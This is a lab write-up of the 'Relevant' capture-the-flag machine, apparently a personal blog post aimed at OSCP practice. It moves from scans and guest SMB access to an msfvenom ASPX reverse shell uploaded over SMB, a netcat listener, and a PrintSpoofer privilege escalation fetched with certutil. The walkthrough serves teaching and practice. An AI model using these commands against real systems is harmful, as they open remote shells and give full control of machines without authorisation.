Relevant | Traps, Token Impersonation, PrintSpoofer

Relevant is medium difficulty that will test the patience or persistence of the attacker. The key points highlighting that it is important to stick to the plan and to revert to basics when hitting a wall.

by Johann Van Niekerk

Relevant | Traps, Token Impersonation, PrintSpoofer

Share

💡
Disclaimer: All topics discussed are intended solely for research purposes and not intended or endorsed for illegal activity.

Relevant is a medium difficulty challenge that sticks to the basics and reminds the attacker that focus on their methodology and it will work. This challenge specifically is great practice for both OSCP and for eCPPT as well. The challenges contained within is useful to perfect and is important to practice for further certifications.

In saying that, the below write up is a guide in tackling the challenge in a methodical way.

Relevant Write up

Back to basics and more!

Target Network Report

Name of Target:

Relevant

System Enumeration

NMAP SCAN:

# NMAP SCAN
PORT     STATE SERVICE       REASON          VERSION
80/tcp   open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0
135/tcp  open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  syn-ack ttl 125 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49663/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown

port 80

The first port to tackle will usually be the webservice on port 80. The information that is gathered from this will normally be vital to understanding the target and the likely attack vectors.

Unfortunately in this case the webservice displayed is the default Microsoft IIS page that shows the web page as incomplete. Running a directory scanner is important in these scenarios as there might be hidden files or directories to uncover.

#OPTIONS
    -n       : No recursion
    -w $FILE : Wordlist
    -u $RHOST: Victim
    
#USAGE
    feroxbuster -n -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://10.10.243.48 

After running Feroxbuster, no results returned and meaning this port is likely a dead end for now.

port 445

Port 135,139 and 445 are all related to SMB-like services. SMB is quick to enumerate and allows quick wins if there is misconfigurations. The preferred method is to enumerate and understand what information is possible from the open port. In this instance, CrackMapExec is the perfect tool and the following is the normal checks in order:

#CME
    crackmapexec smb $RHOST -u '' -p ''              :Test for null shares
    crackmapexec smb $RHOST -u 'administrator' -p '' :Test for administrator null password
    crackmapexec smb $RHOST -u 'guest' -p ''         :Test for guest null password

In this instance, the above shows that 'guest' has a null password so there is access available there (note the plus sign is CrackMapExecs way of visually showing success). This tool is also great for a quick check on whether signing is disabled or enabled. This is important for NTLM Relay attacks and should be kept in the back of the mind for later. This may not be useful with this challenge due to being a single target and not additional targets that communicate but it is important to note regardless.

Moving along, it is possible with CME to enumerate shares and uncovers READ,WRITE access for the "Guest" account

#CME
    cme smb $RHOST -u 'guest' -p '' --shares

With CME confirming shares visible for guest, Next logical step is to log in and search around. In doing so, a passwords.txt is uncovered

#SMBCLIENT
    smbclient //$RHOST/$SHAREfolder -U "guest"
    get passwords.txt

The passwords.txt file contained credentials that were encoded in base64.

echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d                                                                                                        

#Bob - !P@$$W0rD!123

echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d

#Bill - Juw4nnaM4n420696969!$$$ 

With these credentials, it is important to take note for later use. It may be a trap to create a distraction and is important to keep in mind. Attempting to use these on Port 3389 Remote Desktop, fails and proves that the credentials are not important right now.

port 49663

After hitting the roadblock and being blinded with credentials; it is important to 'reset' and review the scanned information available. In this instance, many may not do a full port scan and likely miss these larger uncommon ports.

The focus now shifts to the larger port numbers that were found. Port 49663 shows up as an HTTP service and it makes sense to go have a look. This returns to a Microsoft IIS default page however as this service runs on a different port; then sticking to methodology and doing a directory bust is the likely best step in sticking to the basics.

Running feroxbuster this time discovers the directory /nt4wrksv path that was exactly the same as the SMB share. The page loads with a 200 code with nothing displayed. Given that it has teh same name as the SMB share, testing could start with files found.

Test to see if files are accessible such as "passwords.txt"

Recalling that the user "guest" has READ/WRITE privileges to this share is important as the likely next step is to exploit having the ability to call on a file from the webservice. In saying that, after testing that the upload feature works; it is time to exploit the service with a payload. The service is a Microsoft IIS web service and normally runs with the extension .asp and .aspx rather than .php.

It is important to tailor the payload to this fact.

Information Gathering:

#MSFVENOM
    msfvenom -p windows/x64/shell_reverse_tcp lhost=$LHOST lport=$LPORT -f aspx -o shell.aspx

#SMB - Upload
smbclient //$RHOST/nt4wrksv -u 'guest'
put ./shell.aspx

#SETUP LISTENER
nc -lvnp 4444

#EXPLOIT
curl http://$RHOST:49663/nt4wrksv/shell.aspx             :or just visit the webpage 10.10.6.134:49663/nt4wrksv/shell.aspx

With the successful reverse shell, we are the service defaultapppool (Microsft IIS) with low privileges. It is possible to attain the userflag at this point.

Moving forward it is important to enumerate further misconfigurations. Running the command will display the groups that user is a part of and privileges as well:

#CHECK PRIVS
    whoami /all

From this it is important to understand that there is a variety of different privileges that are vulnerable however SeImpersonatePrivileges are sometimes a golden goose in terms of privilege escalation vectors. There is a variety of ways that this can be exploited.

  1. Metasploit has a module "Incognito" and if the shell used is successful with a meterpreter shell, then it becomes trivial by loading "Incognito" and impersonating the correct token of a higher privilege account.
  2. Additionally, Potato attacks are also doing the same thing with impersonations but these attacks normally rely on DCOM being enabled and this particular target has it disabled.
  3. Finally, after searching we find PrintSpoofer that takes advantage SeAssignPrimaryToken or SeImpersonate privilege tokens.

If interested, have a read of the following to understand what is happening behind the scenes: READ

Compiling this tool is straight forward and then the next step is to upload and exploit. The tool was an immediate NT/System user with the highest privileges.

#SETUP
git clone https://github.com/dievus/printspoofer.git
python -m SimpleHTTPServer 80

#TRANSFER, Run from victim machine
certutil -urlcache -f http://$RHOST/printspoofer.exe printspoofer.exe

#USAGE
.\printspoofer.exe -i -c cmd

The tool is a great asset for token impersonation and made it trivially easy to escalate privileges. The difficulty lies with finding out that DCOM is disabled within the enumeration phase and it may cause headaches by attempting potato attacks and such and not understanding why it is not working.

Overall this featured a trap to mess with the attackers rythm and methodology; directory busting in both port 80 and port 49663 serving as a reminder to always stick with the plan and revert to basics when stuck. Finally it is token impersonation again serving as a reminder to stick with the basics. Find out what system is being dealt with and then once exploited, find out what this exploited user can do.

And finally, if you enjoyed the content and want to see more; feel free to feed the addiction. 👌